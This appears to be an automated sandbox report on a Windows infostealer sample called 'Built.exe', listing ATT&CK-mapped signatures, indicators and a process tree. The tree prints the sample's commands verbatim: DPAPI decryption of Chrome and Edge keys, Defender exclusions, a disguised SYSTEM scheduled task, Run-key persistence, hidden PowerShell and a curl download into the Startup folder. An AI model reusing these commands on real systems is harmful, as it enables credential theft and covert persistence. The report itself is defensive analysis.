8d7299e5a8afb21de858dab6034de69287bc6fabbd2c61ab38e7941fae4ee118

Resubmissions

10/07/2024, 16:21

240710-tt4g1sxemn 8

10/07/2024, 16:21

240710-ttm52azejb 8

Analysis

max time kernel
22s
max time network
37s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
10/07/2024, 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

47.0MB
MD5

0335d9e2a35d3c01f450a6a5aed16a1d
SHA1

e87d6daf1a77258a01e2cce3fe13e060579965bc
SHA256

8d7299e5a8afb21de858dab6034de69287bc6fabbd2c61ab38e7941fae4ee118
SHA512

026f7670bdeb06bd2678e71860a530a1eb2db26cafb96f1873307a01ca39cda52617a7fdd1c920ac681634f99505ea67ec635e34fda342adc0950e4a3370b2b4
SSDEEP

786432:R3on1HvSzxAMNOFZArYsbPv0p7OZYuZpuxa5VJQnlDNoS:RYn1HvSpNOXmbuWbuxOVJQtNh

Score

8^/10

defense_evasion execution persistence spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
25	3656	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5088	powershell.exe
4208	powershell.exe
2556	powershell.exe
4288	powershell.exe
1028	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	Built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

pid	Process
4152	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Built.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\gcOIVfDWprzoTqP.ps1\""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4404	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
15	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
3924	cmd.exe
4116	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 16 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1512	WMIC.exe
2208	WMIC.exe
2352	WMIC.exe
1712	WMIC.exe
2044	WMIC.exe
4908	WMIC.exe
3460	WMIC.exe
4344	WMIC.exe
3876	WMIC.exe
2368	WMIC.exe
1624	WMIC.exe
1792	WMIC.exe
2100	WMIC.exe
3752	WMIC.exe
4052	WMIC.exe
2940	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3368	tasklist.exe
4384	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4376	reg.exe
4796	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3564	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4288	powershell.exe
4288	powershell.exe
2408	powershell.exe
2408	powershell.exe
2592	powershell.exe
2592	powershell.exe
5088	powershell.exe
5088	powershell.exe
4208	powershell.exe
4208	powershell.exe
2676	powershell.exe
2676	powershell.exe
2556	powershell.exe
2556	powershell.exe
4316	powershell.exe
4316	powershell.exe
3696	powershell.exe
3696	powershell.exe
1028	powershell.exe
1028	powershell.exe
5064	powershell.exe
5064	powershell.exe
2612	powershell.exe
2612	powershell.exe
1460	powershell.exe
1460	powershell.exe
1876	powershell.exe
1876	powershell.exe
2208	powershell.exe
2208	powershell.exe
3876	powershell.exe
3876	powershell.exe
3192	powershell.exe
3192	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	4384	tasklist.exe
Token: SeDebugPrivilege	3368	tasklist.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeIncreaseQuotaPrivilege	3224	WMIC.exe
Token: SeSecurityPrivilege	3224	WMIC.exe
Token: SeTakeOwnershipPrivilege	3224	WMIC.exe
Token: SeLoadDriverPrivilege	3224	WMIC.exe
Token: SeSystemProfilePrivilege	3224	WMIC.exe
Token: SeSystemtimePrivilege	3224	WMIC.exe
Token: SeProfSingleProcessPrivilege	3224	WMIC.exe
Token: SeIncBasePriorityPrivilege	3224	WMIC.exe
Token: SeCreatePagefilePrivilege	3224	WMIC.exe
Token: SeBackupPrivilege	3224	WMIC.exe
Token: SeRestorePrivilege	3224	WMIC.exe
Token: SeShutdownPrivilege	3224	WMIC.exe
Token: SeDebugPrivilege	3224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3224	WMIC.exe
Token: SeRemoteShutdownPrivilege	3224	WMIC.exe
Token: SeUndockPrivilege	3224	WMIC.exe
Token: SeManageVolumePrivilege	3224	WMIC.exe
Token: 33	3224	WMIC.exe
Token: 34	3224	WMIC.exe
Token: 35	3224	WMIC.exe
Token: 36	3224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2184	WMIC.exe
Token: SeSecurityPrivilege	2184	WMIC.exe
Token: SeTakeOwnershipPrivilege	2184	WMIC.exe
Token: SeLoadDriverPrivilege	2184	WMIC.exe
Token: SeSystemProfilePrivilege	2184	WMIC.exe
Token: SeSystemtimePrivilege	2184	WMIC.exe
Token: SeProfSingleProcessPrivilege	2184	WMIC.exe
Token: SeIncBasePriorityPrivilege	2184	WMIC.exe
Token: SeCreatePagefilePrivilege	2184	WMIC.exe
Token: SeBackupPrivilege	2184	WMIC.exe
Token: SeRestorePrivilege	2184	WMIC.exe
Token: SeShutdownPrivilege	2184	WMIC.exe
Token: SeDebugPrivilege	2184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2184	WMIC.exe
Token: SeRemoteShutdownPrivilege	2184	WMIC.exe
Token: SeUndockPrivilege	2184	WMIC.exe
Token: SeManageVolumePrivilege	2184	WMIC.exe
Token: 33	2184	WMIC.exe
Token: 34	2184	WMIC.exe
Token: 35	2184	WMIC.exe
Token: 36	2184	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3224	WMIC.exe
Token: SeSecurityPrivilege	3224	WMIC.exe
Token: SeTakeOwnershipPrivilege	3224	WMIC.exe
Token: SeLoadDriverPrivilege	3224	WMIC.exe
Token: SeSystemProfilePrivilege	3224	WMIC.exe
Token: SeSystemtimePrivilege	3224	WMIC.exe
Token: SeProfSingleProcessPrivilege	3224	WMIC.exe
Token: SeIncBasePriorityPrivilege	3224	WMIC.exe
Token: SeCreatePagefilePrivilege	3224	WMIC.exe
Token: SeBackupPrivilege	3224	WMIC.exe
Token: SeRestorePrivilege	3224	WMIC.exe
Token: SeShutdownPrivilege	3224	WMIC.exe
Token: SeDebugPrivilege	3224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3224	WMIC.exe
Token: SeRemoteShutdownPrivilege	3224	WMIC.exe
Token: SeUndockPrivilege	3224	WMIC.exe
Token: SeManageVolumePrivilege	3224	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4152 wrote to memory of 3876	4152	Built.exe	86
PID 4152 wrote to memory of 3876	4152	Built.exe	86
PID 3876 wrote to memory of 3920	3876	cmd.exe	87
PID 3876 wrote to memory of 3920	3876	cmd.exe	87
PID 3876 wrote to memory of 4288	3876	cmd.exe	88
PID 3876 wrote to memory of 4288	3876	cmd.exe	88
PID 4288 wrote to memory of 2192	4288	powershell.exe	89
PID 4288 wrote to memory of 2192	4288	powershell.exe	89
PID 2192 wrote to memory of 1944	2192	csc.exe	90
PID 2192 wrote to memory of 1944	2192	csc.exe	90
PID 4152 wrote to memory of 1328	4152	Built.exe	91
PID 4152 wrote to memory of 1328	4152	Built.exe	91
PID 1328 wrote to memory of 3744	1328	cmd.exe	92
PID 1328 wrote to memory of 3744	1328	cmd.exe	92
PID 4152 wrote to memory of 3236	4152	Built.exe	93
PID 4152 wrote to memory of 3236	4152	Built.exe	93
PID 3236 wrote to memory of 4384	3236	cmd.exe	94
PID 3236 wrote to memory of 4384	3236	cmd.exe	94
PID 4152 wrote to memory of 3880	4152	Built.exe	96
PID 4152 wrote to memory of 3880	4152	Built.exe	96
PID 4152 wrote to memory of 3924	4152	Built.exe	97
PID 4152 wrote to memory of 3924	4152	Built.exe	97
PID 3880 wrote to memory of 3368	3880	cmd.exe	98
PID 3880 wrote to memory of 3368	3880	cmd.exe	98
PID 3924 wrote to memory of 2408	3924	cmd.exe	99
PID 3924 wrote to memory of 2408	3924	cmd.exe	99
PID 4152 wrote to memory of 4116	4152	Built.exe	100
PID 4152 wrote to memory of 4116	4152	Built.exe	100
PID 4116 wrote to memory of 2592	4116	cmd.exe	101
PID 4116 wrote to memory of 2592	4116	cmd.exe	101
PID 4152 wrote to memory of 1544	4152	Built.exe	102
PID 4152 wrote to memory of 1544	4152	Built.exe	102
PID 4152 wrote to memory of 2024	4152	Built.exe	103
PID 4152 wrote to memory of 2024	4152	Built.exe	103
PID 1544 wrote to memory of 3224	1544	cmd.exe	104
PID 1544 wrote to memory of 3224	1544	cmd.exe	104
PID 4152 wrote to memory of 336	4152	Built.exe	105
PID 4152 wrote to memory of 336	4152	Built.exe	105
PID 2024 wrote to memory of 5024	2024	cmd.exe	106
PID 2024 wrote to memory of 5024	2024	cmd.exe	106
PID 4152 wrote to memory of 4404	4152	Built.exe	107
PID 4152 wrote to memory of 4404	4152	Built.exe	107
PID 4152 wrote to memory of 4376	4152	Built.exe	151
PID 4152 wrote to memory of 4376	4152	Built.exe	151
PID 336 wrote to memory of 3564	336	cmd.exe	109
PID 336 wrote to memory of 3564	336	cmd.exe	109
PID 4376 wrote to memory of 2184	4376	cmd.exe	110
PID 4376 wrote to memory of 2184	4376	cmd.exe	110
PID 4404 wrote to memory of 5088	4404	cmd.exe	111
PID 4404 wrote to memory of 5088	4404	cmd.exe	111
PID 4152 wrote to memory of 3408	4152	Built.exe	112
PID 4152 wrote to memory of 3408	4152	Built.exe	112
PID 3408 wrote to memory of 4540	3408	cmd.exe	113
PID 3408 wrote to memory of 4540	3408	cmd.exe	113
PID 4152 wrote to memory of 2056	4152	Built.exe	114
PID 4152 wrote to memory of 2056	4152	Built.exe	114
PID 2056 wrote to memory of 4428	2056	cmd.exe	115
PID 2056 wrote to memory of 4428	2056	cmd.exe	115
PID 4152 wrote to memory of 4564	4152	Built.exe	116
PID 4152 wrote to memory of 4564	4152	Built.exe	116
PID 4564 wrote to memory of 2044	4564	cmd.exe	117
PID 4564 wrote to memory of 2044	4564	cmd.exe	117
PID 4564 wrote to memory of 5040	4564	cmd.exe	118
PID 4564 wrote to memory of 5040	4564	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:3920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4288
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkcrgoxd\bkcrgoxd.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2192
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp" "c:\Users\Admin\AppData\Local\Temp\bkcrgoxd\CSC7BD45C62E23B4B96A73F8DB6CCDA415B.TMP"
        5⤵
        
        PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3880
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,80,53,1,172,14,91,104,64,133,220,87,24,131,228,79,236,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,12,67,112,81,65,254,82,234,42,6,33,141,233,114,232,25,35,71,181,226,244,64,148,129,179,20,208,64,201,255,197,74,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,161,155,8,226,208,242,245,102,136,79,207,151,5,15,165,22,249,45,84,2,134,154,164,50,179,76,44,98,163,221,120,149,48,0,0,0,36,183,155,100,61,28,43,127,28,208,68,3,53,23,101,29,25,177,87,127,251,47,154,146,161,8,167,162,225,26,139,57,188,124,1,159,139,232,206,21,168,231,48,18,239,119,167,75,64,0,0,0,198,115,221,230,246,95,227,174,166,50,88,38,119,54,191,30,233,2,243,56,190,118,166,163,27,174,134,251,106,159,48,234,193,162,64,98,250,139,233,253,43,17,48,239,155,216,105,32,146,85,51,23,51,134,218,213,187,42,205,15,208,127,19,208), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:3924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,80,53,1,172,14,91,104,64,133,220,87,24,131,228,79,236,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,12,67,112,81,65,254,82,234,42,6,33,141,233,114,232,25,35,71,181,226,244,64,148,129,179,20,208,64,201,255,197,74,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,161,155,8,226,208,242,245,102,136,79,207,151,5,15,165,22,249,45,84,2,134,154,164,50,179,76,44,98,163,221,120,149,48,0,0,0,36,183,155,100,61,28,43,127,28,208,68,3,53,23,101,29,25,177,87,127,251,47,154,146,161,8,167,162,225,26,139,57,188,124,1,159,139,232,206,21,168,231,48,18,239,119,167,75,64,0,0,0,198,115,221,230,246,95,227,174,166,50,88,38,119,54,191,30,233,2,243,56,190,118,166,163,27,174,134,251,106,159,48,234,193,162,64,98,250,139,233,253,43,17,48,239,155,216,105,32,146,85,51,23,51,134,218,213,187,42,205,15,208,127,19,208), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,80,53,1,172,14,91,104,64,133,220,87,24,131,228,79,236,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,129,150,7,152,140,34,10,182,108,164,63,240,61,175,181,33,230,254,119,53,36,193,59,222,234,203,28,216,42,204,193,29,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,196,107,94,83,135,184,246,12,210,236,84,62,28,209,97,189,96,138,184,218,175,214,71,162,126,118,179,212,149,73,109,48,0,0,0,254,242,73,0,54,36,26,175,136,189,76,128,3,93,145,141,240,104,235,113,139,213,151,225,21,255,220,72,128,101,113,225,107,85,149,148,182,155,133,219,254,238,99,118,199,51,126,56,64,0,0,0,98,123,239,97,205,76,148,142,164,36,137,89,33,115,154,212,177,107,243,197,112,105,209,52,90,102,239,116,198,85,177,70,201,34,224,49,163,32,131,99,186,223,179,199,117,96,213,31,221,42,86,135,119,207,60,204,129,107,197,59,12,52,50,44), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,80,53,1,172,14,91,104,64,133,220,87,24,131,228,79,236,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,129,150,7,152,140,34,10,182,108,164,63,240,61,175,181,33,230,254,119,53,36,193,59,222,234,203,28,216,42,204,193,29,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,196,107,94,83,135,184,246,12,210,236,84,62,28,209,97,189,96,138,184,218,175,214,71,162,126,118,179,212,149,73,109,48,0,0,0,254,242,73,0,54,36,26,175,136,189,76,128,3,93,145,141,240,104,235,113,139,213,151,225,21,255,220,72,128,101,113,225,107,85,149,148,182,155,133,219,254,238,99,118,199,51,126,56,64,0,0,0,98,123,239,97,205,76,148,142,164,36,137,89,33,115,154,212,177,107,243,197,112,105,209,52,90,102,239,116,198,85,177,70,201,34,224,49,163,32,131,99,186,223,179,199,117,96,213,31,221,42,86,135,119,207,60,204,129,107,197,59,12,52,50,44), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:336
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:4404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:5088
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v0a2cqpi\v0a2cqpi.cmdline"
      4⤵
      PID:2244
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESADF3.tmp" "c:\Users\Admin\AppData\Local\Temp\v0a2cqpi\CSC5D0B6935457040CEABD9802AF0A12845.TMP"
        5⤵
        
        PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3408
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:4540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:3112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2556
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Built.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4376
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:4796
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2044
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:1936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:5068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:3920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:1104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:956
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:3912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:3588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:2236
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3460
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3928
